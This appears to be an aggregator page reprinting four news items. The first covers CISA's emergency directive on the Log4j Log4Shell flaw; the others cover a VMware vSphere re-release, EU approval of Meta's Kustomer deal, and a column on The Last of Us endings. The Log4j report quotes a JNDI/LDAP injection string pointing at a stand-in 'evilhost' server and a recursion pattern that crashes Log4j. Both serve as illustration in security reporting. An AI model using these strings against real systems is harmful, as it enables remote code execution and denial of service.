Connect with us

Technology

CISA issues emergency directive to fix Log4j vulnerability • The Register

Voice Of EU

Published

on

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.

Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a week ago, has since been bypassed.

The software library includes a text-formatting language that allows code execution and the vulnerability enables a remote attacker to craft a string like ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} to fetch the referenced object on the specified server and execute it.

The flaw, referred to as Log4Shell or Logjam, is rated Critical – with a CVSS score of 10.0 – and is already being actively exploited, hence the hullabaloo.

“Since Log4Shell is a critical flaw with a huge attack surface and is very simple to exploit, threat actors are actively using it to launch their attacks even with a patch already released, said Felipe Tarijon, a malware analyst at AppGate, in an email to The Register. “Several state-sponsored groups are exploiting the flaw in the wild and making modifications to the Log4j exploit.”

Tarijon said botnets Muhstik and a Mirai-variant were abusing the flaw on Linux devices before public disclosure, and exploitation activities like the deployment of cryptocurrency miners have been observed. He added that a new ransomware family targeting Windows named Khonsari has been seen exploiting the Log4j vulnerability, which has also been used to deliver the Orcus Remote Access Trojan.

“This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use,” said CISA Director Jen Easterly in a statement last week. “End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software.”

CISA earlier this week published mitigation guidance directing federal civilian agencies to update Log4j to version 2.15 by December 24, 2021, to address CVE-2021-44228.

But on Wednesday that advice was superseded with the recommendation that affected entities update to version 2.16, released two days earlier to address a mitigation bypass and a separate flaw that had been identified, CVE-2021-45046, that allows an attacker to conduct a denial-of-service attack on affected devices via malicious payloads.

The emergency directive requires federal civilian agencies by the end of the business day on December 23rd to: 1) Identify all systems that accept data over the internet; to check those systems against the CISA-managed GitHub repository; apply the latest Log4j patch if appropriate or take vulnerable systems offline; submit a pull request identifying assets not referenced; and assume that vulnerable systems have been compromised, with the post-incident investigation and mitigation that entails.

And by 5 pm EST on December 28, 2021, agencies are required to report systems they identified during this process and to detail whatever action was taken.

The fire drill, however, may not be over yet. The volunteer maintainers of Log4j have identified an infinite recursion bug, affecting versions up through 2.16, that apparently will crash the application if string substitution is attempted on this string pattern ${${::-${::-$${::-j}}}}.

As this article was filed, there’s not yet public agreement about whether this constitutes a meaningful denial-of-service attack risk or about whether a CVE will be sought for the issue. Stay tuned.

“The first patch (2.15) still has a vulnerability in non-default configurations allowing exfiltration of sensitive data,” said Tarijon in an email to The Register. “So, applying the latest patch by updating to 2.16 would be enough to fix the remote code execution (RCE) problem. It disables JNDI, the component abused to leverage the RCE.

The recursion bug in version 2.16, he said, appears to be less critical because it can only be used for a denial of service attack that crashes the log system. Though the RCE bug has been patched in 2.16, he expects it will continue to have a significant impact because of the huge attack surface that depends upon vendors and third parties who may not apply patches quickly enough.

“As a reference, the PrintSpooler vulnerabilities in July of this year led to an RCE bug, patched by Microsoft, but subsequent exploits and variants appeared later as soon as threat actors started to abuse the vulnerability in the wild,” Tarijon explained.

In other words, expect to keep hearing about Log4j. ®

Source link

Technology

VMware fixes buggy vSphere release – and Log4J, too • The Register

Voice Of EU

Published

on

VMware has restored availability of vSphere 7 Update, a release that it withdrew in late 2021 after driver dramas derailed deployments.

Paul Turner, Virtzilla’s veep for vSphere product management, told The Register that the source of the problem was Intel driver updates that arrived out of sync with VMware’s pre-release testing program. When users adopted the new drivers – one of which had been renamed – vSphere produced errors that meant virtual server fleet managers could not sustain high availability operations.

Turner said around 30,000 customers had adopted the release, of which around eight per cent encountered the issue. That collection of around 2,400 impacted users was enough for VMware to pull the release before the other 270,000 vSphere users hit trouble. That level of potential problems, Turner admitted, was considered a sufficient threshold to justify a do-over and the embarrassment of a pulled release.

VMware has since reviewed its testing program and procedures in the hope it will avoid a repeat of this error. Doing so, and repairing the release, meant a busier-than-usual holiday period for VMware developers. Turner said those who put in the extra hours will be compensated with extra time off in the future.

VMware also used the time needed to get the release ready to ensure that vSphere 7 U3 thoroughly addresses the Log4j bug. It took the opportunity to update to the latest version of the tool – which is free of the critical bug that allowed almost any code to execute without authorisation.

But VMware decided not to add anything new to vSphere while it addressed Log4j and sorted out the driver drama. Users will have to wait a few more months for another dose of VMware’s usual concoction of security updates and feature tweaks.

There’s more interesting stuff on the way, too. VMware has promised a full vSphere-as-a-Service offering is in the works, and the Project Capitola software-defined memory tech that will pool RAM across hosts. The company has also dropped hints that its plan to run its ESX hypervisor on SmartNICs is nearing release.

VMware has detailed the new/old release here and made downloads available here

Source link

Continue Reading

Technology

Facebook given EU go-ahead to pursue controversial Kustomer acquisition

Voice Of EU

Published

on

The EU’s antitrust chief Margrethe Vestager said she was satisfied for the company now known as Meta to pursue its Kustomer acquisition after it struck a deal for rivals.

Meta, the company formerly known as Facebook, has secured antitrust approval from the EU to pursue its acquisition of US customer services software start-up Kustomer.

The social media giant’s decision to acquire the start-up attracted EU scrutiny last April, months before its rebrand. Then known as Facebook, the company planned to integrate Kustomer’s products, including a chatbot, into its service.

Now, Meta has assured the European Commission that it will provide rivals free access to its messaging channels for 10 years.

The EU was satisfied that this addressed competition concerns which previously arose from the company’s decision to acquire Kustomer.

“Our decision today will ensure that innovative rivals and new entrants in the customer relationship management software market can effectively compete,” EU antitrust chief Margrethe Vestager said in a statement.

Last December, Vestager’s Digital Markets Act was passed by EU lawmakers as part of the body’s plans to tighten the monopoly large multinationals hold in Europe’s digital space.

Facebook had initially announced its acquisition plan in November 2020. In February 2021, the Irish Council for Civil Liberties wrote to the European Commission outlining its concerns over data that Kustomer had gathered and what might happen to that data under Facebook’s watch. The Commission also received a referral request from Austria flagging concerns over the Kustomer deal.

Other Meta acquisitions have also attracted the scrutiny of competition regulators. Last November, the UK ordered Meta to sell Giphy after its acquisition of the GIF making company was found to have breached competition rules. In the US, it is facing an antitrust suit that could force the company to sell WhatsApp and Instagram.

The EU’s decision to allow Meta to pursue the acquisition of Kustomer comes following a recent vote in the European Parliament in favour of the Digital Services Act, a companion of the Digital Markets Act. The act represents the EU’s attempt to shift the balance of power away from Big Tech in favour of ordinary people.

The long-debated act was hailed by Facebook whistleblower Frances Haugen as a “gold standard”.

Don’t miss out on the knowledge you need to succeed. Sign up for the Daily Brief, Silicon Republic’s digest of need-to-know sci-tech news.

Source link

Continue Reading

Technology

Now that I’ve finally played The Last of Us, who wants to talk about that ending? | Games

Voice Of EU

Published

on

‘OK, Dad, this is an incredible essay on the effects of grief and grey morality in a postapocalyptic society,” says the eldest child, AKA the millennial. “It’s got proper female characters, progressive takes on sexuality and tonnes of rain.”

“They’ve made a video game of The Handmaid’s Tale?”

“No, Dad. It’s The Last of Us. Don’t worry. It’s still a zombie shooter. And both games have the best ending ever.”

Now she has my interest. Video game endings fascinate me, because my generation started out with arcade games that didn’t have them. Pac-Man kept eating dots and chasing ghosts and the Space Invaders kept coming, wave after incessant wave. The first arcade game that had an actual ending was Dragon’s Lair and nobody actually saw that because it was so hard to complete.

I have a tough start with The Last of Us because I hate games where you search for stuff in every room of a house. I spend my normal life doing that with car keys and headphones. I want games where you walk into a room and all the objects get sucked into a magic pocket. But that isn’t realistic, I hear you cry. Well, neither is only being able to carry three shivs in a world where, despite the zombie apocalypse, cargo pants clearly still exist.

The Last of Us.
Jaw-dropping … The Last of Us. Photograph: Sony

I also hate any form of crafting, because that was what my generation had to do for “fun” as kids before we had video games. Whether it’s smoke bombs from sugar and explosives or a set of Action Man drawers from matchboxes, it’s all boring to me.

“Keep going,” I tell myself. “The millennial says it’s got the best ending ever.”

Throughout the first chapter of Joel and Ellie’s jaunt across a post-infected US I keep trying to guess what this great ending will be. Maybe Ellie isn’t immune to infection after all? Maybe Joel is her real father? Maybe they’re both unwitting participants in some reality TV show, I’m Infected Get Me Out of Here?

As you will all know by now – and if you’ve yet to play The Last of Us then please stop reading – the ending has Joel murder a perfectly innocent and well-intentioned doctor who wants to cut Ellie open to find a cure that will save humanity. But Joel has no truck with utilitarian philosophy, because Ellie has now become a replacement for the daughter he lost. So, he disregards mankind’s future and, by stopping the operation, effectively murders the entire human race (alongside a whole hospital’s worth of doctors).

“Why does he do that?” I asked the millennial, in one of many fantastic discussions we had about the game.

“Because he’s a white male,” came the answer, because it’s 2022 and she’s in her 20s. And maybe she’s right. Either way it is a jaw-dropping, supremely brave ending and the terrific Left Behind side-story also brought the feels.

The Last of Us Part 2
Grey morality … Ellie in The Last of Us Part 2. Photograph: Naughty Dog

So, when it came to The Last of Us Part 2, I was beyond excited. Fifty million hours later I was beyond disappointed.

Don’t get me wrong, the millennial nailed it when she said it was a great exploration of the effects of grief and grey morality. But after spending the whole game switching between two strong female characters (literally, have you seen Abby’s arms?) and contrasting factional creeds, you have the final confrontation. They fight. And … they both live. And go their separate ways. The only real damage is Ellie losing a couple of fingers, and the game portrays the worst consequence of this as not being able to play guitar any more. Seriously? That’s the biggest drawback to being fingerless in a zombie apocalypse? The first game ended with Joel murdering an entire civilisation, the second ends with Ellie murdering one song on a guitar. It’s a scene you might have found in The Secret of Monkey Island. It’s hilarious.

The Last of Us Part 2 leaves us with exactly the same non-ending as those original arcade games. Ellie and Abby will go on killing to keep their respective postapocalyptic factions going, both driven by the grief of murdered loved ones. They are both trapped, endlessly chasing ghosts. Sounds familiar…

The millennial says this shows there are no winners when it comes to revenge. I say they want both protagonists alive for The Last of Us 3. It’s a cynical cop out. But then, The Last of Us Part 2 is a game that features the most cynical scene ever, where apropos of nothing, after genuinely bravura portrayals of women, transgender and gay characters, alpha female Abby suddenly gets rogered from behind by some guy. It happens out of nowhere. The game spends umpteen hours portraying progressive sexuality, and then it’s like some marketing man decided they needed to toss the incels a piece of red meat to stop them hate-bombing all over 4chan (which didn’t work). It is easily the most gratuitous bit of nudity I have ever seen in games, and I have played The Witcher 3. The rogerer in question even has a girlfriend. Who is pregnant. Way to shit on a sister, Abby.

“It’s basically Pac-Man with gratuitous boobs,” I say to my eldest, who sighs and pours herself a large cup of coffee. This will be another long discussion.

Source link

Continue Reading

Trending

Subscribe To Our Newsletter

Join our mailing list to receive the latest news and updates 
directly on your inbox.

You have Successfully Subscribed!